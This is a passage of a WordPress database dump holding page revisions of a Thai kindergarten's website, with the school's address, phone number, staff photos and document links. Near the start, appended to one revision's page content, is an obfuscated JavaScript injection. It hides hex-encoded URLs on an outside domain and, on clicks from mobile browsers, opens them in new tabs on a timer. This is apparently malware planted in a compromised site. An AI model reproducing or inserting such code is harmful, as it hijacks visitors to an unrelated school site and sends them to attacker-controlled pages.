gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:11:58','2025-07-15 10:11:58','',19,'http://watprato.ssk.in.th/?p=726',0,'revision','',0),
(727,1,'2025-07-15 17:14:46','2025-07-15 10:14:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem 